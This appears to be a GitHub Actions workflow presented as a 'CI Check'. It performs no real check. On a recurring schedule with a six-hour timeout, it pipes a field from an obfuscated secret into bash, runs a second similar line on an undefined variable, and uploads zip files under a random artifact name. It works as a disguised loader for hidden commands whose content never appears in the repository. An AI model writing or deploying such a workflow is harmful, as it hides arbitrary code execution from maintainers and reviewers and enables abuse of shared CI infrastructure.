name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '0 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          dygw13296: ${{ secrets.dygw13296 }}
        run: |
          printf '%s' "$dygw13296" | jq -r .sm48165 | /bin/bash
          echo $jiwh367 | jq -r .yx89033 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: G4VwMKki
          path: "*.zip"
          retention-days: 1
